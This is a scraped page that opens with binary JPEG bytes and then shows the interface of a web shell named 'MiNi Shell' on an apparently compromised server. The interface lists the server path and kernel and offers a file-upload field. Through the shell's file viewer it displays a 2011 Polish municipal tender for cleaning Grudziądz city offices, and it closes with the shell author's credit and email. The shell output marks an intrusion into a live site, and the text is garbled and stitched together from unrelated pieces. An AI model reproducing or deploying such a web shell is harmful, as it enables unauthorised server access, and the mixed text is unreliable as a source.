JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111114/295167-N-2011.html

<p class="kh_header"><b>Grudziądz: Świadczenie usług w zakresie utrzymania porządku i czystości w pomieszczeniach zajmowanych przez Urząd Miejski w Grudziądzu</b><br>
<b>Numer ogłoszenia: 295167 - 2011; data zamieszczenia: 14.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 4510233, faks 56 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie utrzymania porządku i czystości w pomieszczeniach zajmowanych przez Urząd Miejski w Grudziądzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie utrzymania porządku i czystości w pomieszczeniach zajmowanych przez Urząd Miejski w Grudziądzu.

Szczegółowy opis przedmiotu zamówienia:
1. Wykaz obiektów Urzędu Miejskiego w Grudziądzu  objętych utrzymaniem porządku i czystości.                                                                            
Łączna powierzchnia pomieszczeń sprzątanych wynosi  5.418,14 m 2.
1. budynek przy ul. Ratuszowej 1 o powierzchni  3.094,77 m 2:
- powierzchnia wykładzin i dywanów do odkurzania wynosi  1293,00 m 2
- powierzchnia wykładzin PCV, posadzek kamiennych i lastryko wynosi  805,47 m 2
- powierzchnia z drewna ( parkiet) wynosi  635,00 m 2
- powierzchnia z terakoty wynosi  361,30 m 2
- powierzchnia okien do mycia wynosi  1.116,72 m 2
- ilość lamp do mycia wynosi  374 szt.
- ilość skrzynek na gaśnice do mycia wynosi  19 szt.
- ilość gablot informacyjnych do mycia wynosi  14 szt.
- powierzchnia oszklenia windy wynosi  97,52 m 2
- powierzchnia oszklenia drzwi wejściowych do biur wynosi  43,16 m 2; 

2. budynek przy ul. Mickiewicza 28/30 o powierzchni  1.158 m2:
- powierzchnia wykładzin i dywanów do odkurzania wynosi  293,28 m 2
- powierzchnia wykładzin PCV, posadzek kamiennych i lastryko  wynosi  654,72 m 2
- powierzchnia z drewna ( parkiet) wynosi  150,00 m 2
 -powierzchnia z terakoty wynosi  60,00 m 2
- powierzchnia okien do mycia wynosi  368,00 m 2
- ilość lamp do mycia wynosi  157 szt.
- ilość skrzynek na gaśnice do mycia wynosi  2 szt. 
- ilość gablot informacyjnych do mycia wynosi  8 szt.;

3. budynek przy ul. Wodnej  7 o powierzchni  200,88 m 2: 
- powierzchnia  z paneli wynosi  154,26 m 2
- powierzchnia  z terakoty wynosi  46,62 m 2 
- powierzchnia okien do mycia wynosi  18,81 m 2
- ilość lamp do mycia wynosi  33 szt.
- ilość skrzynek na gaśnice do mycia wynosi  3 szt.;
4. pomieszczenia w budynku przy ul. Strażackiej o powierzchni  200,00 m 2:
- powierzchnia wykładzin do odkurzania wynosi  61,00m 2 
- powierzchnia  z terakoty wynosi  38,00 m 2
- powierzchnia  z paneli wynosi  101,00 m 2 
- powierzchnia okien do mycia wynosi  28,08 m 2
- ilość lamp do mycia wynosi  38 szt.
- ilość skrzynek na gaśnice do mycia wynosi  2 szt.;

5. pomieszczenia w budynkach przy ul. Piłsudskiego 51 o powierzchni  570 m 2:
- powierzchnia wykładziny i dywanów do odkurzania wynosi  11,61 m 2
- powierzchnia z paneli wynosi  51,93 m 2
- powierzchnia wykładzin PCV, posadzek kamiennych  wynosi  506,46 m 2
- powierzchnia okien do mycia wynosi  42,84 m 2
- ilość lamp do mycia wynosi  52 szt.
- ilość skrzynek na gaśnice do mycia wynosi  2 szt.                                                                                               ilość gablot informacyjnych do mycia wynosi  2 szt.; 

6. pomieszczenia w budynku przy ul. Toruńskiej 6 o powierzchni  28,49 m 2: 
- powierzchnia z terakoty wynosi  28,49 m 2
- powierzchnia okien do mycia wynosi  13,53 m 2
- ilość lamp do mycia wynosi  9 szt.;

7. pomieszczenia w budynku przy ul. Legionów  74/84 o powierzchni  38,00 m 2:
- powierzchnia wykładzin PCV wynosi  28,00 m 2
- powierzchnia z terakoty wynosi  10,00 m 2 
- powierzchnia okien do mycia wynosi  9,00 m 2
- ilość lamp do mycia wynosi  7 szt.;

8. pomieszczenia w budynku przy ul. Nad Torem 1 o powierzchni  128,00 m 2: 
- powierzchnia z terakoty wynosi  64,00 m 2
- powierzchnia wykładzin PCV , posadzek kamiennych wynosi  64,00 m 2
- powierzchnia okien do mycia wynosi  42,00 m 2
- ilość gablot informacyjnych do mycia wynosi  1 szt.

2. Zakres i częstotliwość prac.

1.  W pomieszczeniach biurowych:

- odkurzanie wykładzin dywanowych i dywanów - codziennie, 
- mycie posadzek drewnianych  z terakoty i wykładzin PCV - codziennie,
- wycieranie kurzu z mebli, półek, grzejników, listew odbojowych i parapetów okiennych - codziennie,
- opróżnianie koszy na śmieci i wymiana worków - codziennie,
- wymiana worków na ścinki w niszczarkach biurowych w momencie, gdy worki są zapełnione,
- usuwanie pajęczyn - codziennie.

2.  W ciągach komunikacyjnych (korytarze i klatki schodowe):

- zamiatanie, mycie posadzek i schodów - codziennie,
- mycie drzwi do pomieszczeń biurowych  -  codziennie ,
- opróżnianie popielnic i koszy na śmieci na korytarzach- codziennie,
- mycie poręczy  na klatkach schodowych - codziennie,
- mycie skrzynek na gaśnice - codziennie,
- mycie gablot informacyjnych - codziennie.

3.  W sanitariatach:

- mycie posadzek- codziennie,
- mycie płytek ściennych i drzwi - codziennie,
- czyszczenie urządzeń sanitarnych (muszle , pisuary, umywalki), pojemników na  mydło  i  papier oraz suszarek do rąk - codziennie,
- czyszczenie luster i baterii umywalkowych - codziennie,
- opróżnianie koszy na śmieci i wymiana worków na śmieci - codziennie.

4.  W kuchni:

- mycie naczyń -codziennie,
- mycie blatów, szafek kuchennych i zlewozmywaka - codzienne,
- czyszczenie sprzętu agd.- codziennie,
- mycie terakoty- codziennie,
- opróżnianie koszy na śmieci i wymiana worków na śmieci - codziennie.

5.  W salach konferencyjnych:

- sprzątanie i mycie naczyń po zakończonych uroczystościach, Sesjach RM, komisjach, spotkaniach itp. 

6.  W zakres prac wchodzą także:

- mycie ram okiennych i szyb  we wszystkich pomieszczeniach na klatkach schodowych i  korytarzach  3 razy do roku  w terminach do 15 kwietnia, do 15 lipca i do 15 października,
- mycie oszklenia windy - codziennie,
- mycie oszklenia drzwi wejściowych do pomieszczeń biurowych - codziennie,                               
- czyszczenie i mycie lamp sufitowych -  raz na kwartał.
Wykonawca zobowiązuje się do świadczenia usług w zakresie utrzymania porządku i czystości w obiektach zajmowanych przez Urząd Miejski w Grudziądzu w następujący sposób: w poniedziałki, środy, czwartki, piątki od godz. 15:30, we wtorki od godz. 16: 00, z wyłączeniem pomieszczeń przy ul. Toruńskiej 6, w których usługi muszą się odbywać dwa razy w tygodniu (środy, piątki) od godz. 15: 30, pomieszczeń przy ul. Legionów 74/84, w których usługi muszą się odbywać  jeden raz w tygodniu (piątek) do godz. 15: 30, pomieszczeń przy ul. Nad Torem 1, w których usługi muszą się odbywać raz na dwa tygodnie (czwartek) do godz. 15:30.
Wykonawca będzie wykonywał przedmiot umowy za pomocą własnych narzędzi, środków czystości, sprzętu i materiałów z wyłączeniem następujących materiałów, które zapewni Zamawiający: 
1)  mydło w płynie do dozowników,
2)   papier toaletowy,
3)   środki zapachowe,
4)    ręczniki papierowe,
5)    środki do stałej dezynfekcji WC.
Wykonawca zobowiązany jest używać środków czystości oraz materiałów posiadających atest PZH (Państwowego Zakładu Higieny), odpowiednich do danego rodzaju powierzchni. Środki i materiały powinny być w oryginalnych opakowaniach umożliwiających identyfikację producenta. 
Wykonawca zapewni do wykonania  zamówienia :
- minimum  7 osób do realizacji   usługi  w budynku przy ul. Ratuszowej 1,
- minimum  2 osoby do realizacji usługi  w budynku przy ul. Mickiewicza 28/30,
- minimum 1 osobę do realizacji  usługi w budynku przy ul. Wodnej 7, 
- minimum 1 osobę do realizacji  usługi  w budynku przy ul. Piłsudskiego 51, 
- minimum 1 osobę  do realizacji usługi w budynku przy ul. Strażackiej 1,
- minimum 1 osobę do realizacji  usługi w budynku przy ul. Nad Torem 1,
- minimum 1 osobę do realizacji  usługi w budynku przy ul. Toruńskiej 6,  
- minimum 1 osobę do realizacji  usługi  w budynku przy ul. Legionów 74/84.
Uwaga!
Wykonawca zobowiązany będzie posiadać poświadczenie bezpieczeństwa o klauzuli przynajmniej ZASTRZEŻONE dla osób, które będą wykonywać usługę objętą przedmiotem umowy w budynku Urzędu Miejskiego przy ul. Strażackiej 1 albo upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE, uzyskane zgodnie z art. 21 ust. 4, pkt 1 i 2 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r. Nr 182, poz.1228 z  późn .zm.).
Zamawiający zaleca Wykonawcy przeprowadzenie wizji lokalnej.
Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku formularza ofertowego zakres zamówienia powierzany podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia.
Termin wykonania zamówienia - od 01.01.2012 r. do 31.12.2011 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości  3.000,00 zł (słownie: trzy tysiące złotych 00/100).
Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej , z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank PKO BP SA numer 31 1020 5040 0000 6902 0085 9652.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
Wadium wnoszone w formie: poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo - kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w kasie Zamawiającego w pokoju nr 306. 
Nie należy załączać oryginału dokumentu wadialnego do oferty.
Gwarancje i poręczenia muszą zawierać zapisy gwarantujące wypłatę na każde pisemne wezwanie Zamawiającego, zgłoszone w terminie związania ofertą, pełnej kwoty wadium w okolicznościach wymienionych w art. 46 ust. 4 a i art. 46 ust. 5 ustawy.
Wadium musi być wniesione na cały okres związania ofertą. Wniesienie wadium na czas krótszy niż okres związania ofertą Zamawiający będzie traktował tak, jakby wadium nie zostało wniesione. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Wykonawca, który nie wniesie wadium w sposób określony w SIWZ zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje,  na podstawie umowy zawartej na co najmniej 12 miesięcy, jedną usługę sprzątania w obiektach biurowych o łącznej powierzchni przekraczającej 3000 m 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną (osoby nie wymienione) w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii notarialnie poświadczonej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2011 godzina 10:00, miejsce: Biuro Zamówień Publicznych Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, 86-300 Grudziądz, pokój nr 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com